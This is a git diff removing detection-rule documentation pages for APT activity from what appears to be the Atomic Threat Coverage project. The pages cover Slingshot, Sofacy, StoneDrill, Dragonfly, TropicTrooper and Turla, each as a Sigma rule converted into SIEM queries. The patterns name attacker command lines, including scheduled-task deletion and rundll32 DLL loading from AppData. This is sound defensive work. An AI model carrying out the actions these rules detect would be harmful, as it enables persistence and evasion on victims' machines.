-description: Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group
-references:
-    - https://securelist.com/apt-slingshot/84312/
-tags:
-    - attack.persistence
-    - attack.t1053
-    - attack.s0111
-detection:
-    condition: 1 of them
-falsepositives:
-    - Unknown
-level: medium
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine:
-            - '*schtasks* /delete *Defrag\ScheduledDefrag*'
----
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success'
-detection:
-    selection2:
-        EventID: 4701
-        TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*schtasks.* /delete .*Defrag\\ScheduledDefrag.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Security | where {($_.ID -eq "4701" -and $_.message -match "TaskName.*\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*schtasks*\ \/delete\ *Defrag\\ScheduledDefrag*)
-(winlog.channel:"Security" AND winlog.event_id:"4701" AND TaskName:"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/958d81aa-8566-4cea-a565-59ccd4df27b0 <<EOF
-{
-  "metadata": {
-    "title": "Defrag Deactivation",
-    "description": "Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group",
-    "tags": [
-      "attack.persistence",
-      "attack.t1053",
-      "attack.s0111"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*schtasks*\\ \\/delete\\ *Defrag\\\\ScheduledDefrag*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*schtasks*\\ \\/delete\\ *Defrag\\\\ScheduledDefrag*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Defrag Deactivation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/958d81aa-8566-4cea-a565-59ccd4df27b0-2 <<EOF
-{
-  "metadata": {
-    "title": "Defrag Deactivation",
-    "description": "Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group",
-    "tags": [
-      "attack.persistence",
-      "attack.t1053",
-      "attack.s0111"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4701\" AND TaskName:\"\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4701\" AND TaskName:\"\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Defrag Deactivation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*schtasks* \/delete *Defrag\\ScheduledDefrag*)
-(EventID:"4701" AND TaskName:"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag")
-```
-
-
-### splunk
-    
-```
-(CommandLine="*schtasks* /delete *Defrag\\ScheduledDefrag*")
-(source="WinEventLog:Security" EventCode="4701" TaskName="\\Microsoft\\Windows\\Defrag\\ScheduledDefrag")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*schtasks* /delete *Defrag\\ScheduledDefrag*"])
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4701" TaskName="\\Microsoft\\Windows\\Defrag\\ScheduledDefrag")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*schtasks.* /delete .*Defrag\ScheduledDefrag.*)'
-grep -P '^(?:.*(?=.*4701)(?=.*\Microsoft\Windows\Defrag\ScheduledDefrag))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_sofacy.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_sofacy.md
deleted file mode 100644
index aaf24ee..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_sofacy.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Sofacy Trojan Loader Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Trojan loader acitivty as used by APT28 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/](https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/)</li><li>[https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100](https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100)</li><li>[https://twitter.com/ClearskySec/status/960924755355369472](https://twitter.com/ClearskySec/status/960924755355369472)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0007</li><li>car.2013-10-002</li><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Sofacy Trojan Loader Activity
-id: ba778144-5e3d-40cf-8af9-e28fb1df1e20
-author: Florian Roth
-status: experimental
-date: 2018/03/01
-description: Detects Trojan loader acitivty as used by APT28
-references:
-    - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/
-    - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100
-    - https://twitter.com/ClearskySec/status/960924755355369472
-tags:
-    - attack.g0007
-    - attack.execution
-    - attack.t1059
-    - attack.defense_evasion
-    - attack.t1085
-    - car.2013-10-002
-    - attack.t1218.011
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - 'rundll32.exe %APPDATA%\\*.dat",*'
-            - 'rundll32.exe %APPDATA%\\*.dll",#1'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*rundll32.exe %APPDATA%\\.*.dat\",.*" -or $_.message -match "CommandLine.*rundll32.exe %APPDATA%\\.*.dll\",#1")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(rundll32.exe\ %APPDATA%\\*.dat\",* OR rundll32.exe\ %APPDATA%\\*.dll\",#1)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ba778144-5e3d-40cf-8af9-e28fb1df1e20 <<EOF
-{
-  "metadata": {
-    "title": "Sofacy Trojan Loader Activity",
-    "description": "Detects Trojan loader acitivty as used by APT28",
-    "tags": [
-      "attack.g0007",
-      "attack.execution",
-      "attack.t1059",
-      "attack.defense_evasion",
-      "attack.t1085",
-      "car.2013-10-002",
-      "attack.t1218.011"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(rundll32.exe\\ %APPDATA%\\\\*.dat\\\",* OR rundll32.exe\\ %APPDATA%\\\\*.dll\\\",#1)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(rundll32.exe\\ %APPDATA%\\\\*.dat\\\",* OR rundll32.exe\\ %APPDATA%\\\\*.dll\\\",#1)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Sofacy Trojan Loader Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(rundll32.exe %APPDATA%\\*.dat\",* rundll32.exe %APPDATA%\\*.dll\",#1)
-```
-
-
-### splunk
-    
-```
-(CommandLine="rundll32.exe %APPDATA%\\*.dat\",*" OR CommandLine="rundll32.exe %APPDATA%\\*.dll\",#1")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["rundll32.exe %APPDATA%\\*.dat\",*", "rundll32.exe %APPDATA%\\*.dll\",#1"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*rundll32\.exe %APPDATA%\\.*\.dat",.*|.*rundll32\.exe %APPDATA%\\.*\.dll",#1)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_stonedrill.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_stonedrill.md
deleted file mode 100644
index 1d8ba4c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_stonedrill.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | StoneDrill Service Install       |
-|:-------------------------|:------------------|
-| **Description**          | This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/](https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0064</li><li>attack.t1543.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: StoneDrill Service Install
-id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6
-description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
-author: Florian Roth
-date: 2017/03/07
-references:
-    - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
-tags:
-    - attack.persistence
-    - attack.g0064
-    - attack.t1050
-    - attack.t1543.003
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
-        ServiceName: NtsSrv
-        ServiceFileName: '* LocalService'
-    condition: selection
-falsepositives:
-    - Unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and $_.message -match "ServiceName.*NtsSrv" -and $_.message -match "ServiceFileName.*.* LocalService") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND winlog.event_data.ServiceName:"NtsSrv" AND winlog.event_data.ServiceFileName.keyword:*\ LocalService)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6 <<EOF
-{
-  "metadata": {
-    "title": "StoneDrill Service Install",
-    "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky",
-    "tags": [
-      "attack.persistence",
-      "attack.g0064",
-      "attack.t1050",
-      "attack.t1543.003"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"NtsSrv\" AND winlog.event_data.ServiceFileName.keyword:*\\ LocalService)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"NtsSrv\" AND winlog.event_data.ServiceFileName.keyword:*\\ LocalService)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'StoneDrill Service Install'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ServiceName:"NtsSrv" AND ServiceFileName.keyword:* LocalService)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" ServiceName="NtsSrv" ServiceFileName="* LocalService")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" service="NtsSrv" ServiceFileName="* LocalService")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*NtsSrv)(?=.*.* LocalService))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_ta17_293a_ps.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_ta17_293a_ps.md
deleted file mode 100644
index 74c565b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_ta17_293a_ps.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Ps.exe Renamed SysInternals Tool       |
-|:-------------------------|:------------------|
-| **Description**          | Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Renamed SysInternals tool</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.us-cert.gov/ncas/alerts/TA17-293A](https://www.us-cert.gov/ncas/alerts/TA17-293A)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0035</li><li>car.2013-05-009</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Ps.exe Renamed SysInternals Tool
-id: 18da1007-3f26-470f-875d-f77faf1cab31
-description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
-references:
-    - https://www.us-cert.gov/ncas/alerts/TA17-293A
-tags:
-    - attack.defense_evasion
-    - attack.g0035
-    - attack.t1036
-    - car.2013-05-009
-author: Florian Roth
-date: 2017/10/22
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: 'ps.exe -accepteula'
-    condition: selection
-falsepositives:
-    - Renamed SysInternals tool
-level: high
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*ps.exe -accepteula") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine:"ps.exe\ \-accepteula"
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/18da1007-3f26-470f-875d-f77faf1cab31 <<EOF
-{
-  "metadata": {
-    "title": "Ps.exe Renamed SysInternals Tool",
-    "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.g0035",
-      "attack.t1036",
-      "car.2013-05-009"
-    ],
-    "query": "winlog.event_data.CommandLine:\"ps.exe\\ \\-accepteula\""
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine:\"ps.exe\\ \\-accepteula\"",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Ps.exe Renamed SysInternals Tool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine:"ps.exe \-accepteula"
-```
-
-
-### splunk
-    
-```
-CommandLine="ps.exe -accepteula"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="ps.exe -accepteula")
-```
-
-
-### grep
-    
-```
-grep -P '^ps\.exe -accepteula'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_tropictrooper.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_tropictrooper.md
deleted file mode 100644
index 946f4af..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_tropictrooper.md
+++ /dev/null
@@ -1,172 +0,0 @@
-| Title                    | TropicTrooper Campaign November 2018       |
-|:-------------------------|:------------------|
-| **Description**          | Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/](https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/)</li></ul>  |
-| **Author**               | @41thexplorer, Microsoft Defender ATP |
-| Other Tags           | <ul><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: TropicTrooper Campaign November 2018
-id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
-author: '@41thexplorer, Microsoft Defender ATP'
-status: stable
-date: 2019/11/12
-description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
-references:
-    - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
-tags:
-    - attack.execution
-    - attack.t1085
-    - attack.t1218.011
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*'
-    condition: selection
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8c7090c3-e0a0-4944-bd08-08c3a0cecf79 <<EOF
-{
-  "metadata": {
-    "title": "TropicTrooper Campaign November 2018",
-    "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia",
-    "tags": [
-      "attack.execution",
-      "attack.t1085",
-      "attack.t1218.011"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'TropicTrooper Campaign November 2018'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*
-```
-
-
-### splunk
-    
-```
-CommandLine="*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_commands.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_commands.md
deleted file mode 100644
index 295f589..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_commands.md
+++ /dev/null
@@ -1,287 +0,0 @@
-| Title                    | Turla Group Lateral Movement       |
-|:-------------------------|:------------------|
-| **Description**          | Detects automated lateral movement by Turla group |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li><li>[T1083: File and Directory Discovery](https://attack.mitre.org/techniques/T1083)</li><li>[T1135: Network Share Discovery](https://attack.mitre.org/techniques/T1135)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1083: File and Directory Discovery](../Triggers/T1083.md)</li><li>[T1135: Network Share Discovery](../Triggers/T1135.md)</li></ul>  |
-| **Severity Level**       |  Severity Level for this Detection Rule wasn't defined yet  |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securelist.com/the-epic-turla-operation/65545/](https://securelist.com/the-epic-turla-operation/65545/)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.g0010</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Turla Group Lateral Movement
-id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f
-status: experimental
-description: Detects automated lateral movement by Turla group
-references:
-    - https://securelist.com/the-epic-turla-operation/65545/
-tags:
-    - attack.g0010
-    - attack.execution
-    - attack.t1059
-    - attack.lateral_movement
-    - attack.t1077
-    - attack.discovery
-    - attack.t1083
-    - attack.t1135
